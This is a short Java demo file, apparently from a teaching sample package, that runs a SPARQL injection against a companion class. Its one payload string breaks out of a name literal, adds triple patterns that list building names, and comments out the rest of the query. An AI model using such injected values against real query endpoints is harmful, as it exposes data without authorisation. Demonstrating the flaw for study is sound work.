package injection.sample1_SPARQL_Injection;

// SPARQL Injection
public class Sample1hack {
	public static void main(String [] args) throws Exception{
		Sample1code sample = new Sample1code();
		String name = "Pablo Orduna' . " +
			"?b1 a injection:Building . " +
			"?b1 injection:name ?name1 . " +
			"} #"; // }:-D		
		String result = sample.run(name);
		System.out.println(result);
	}
}
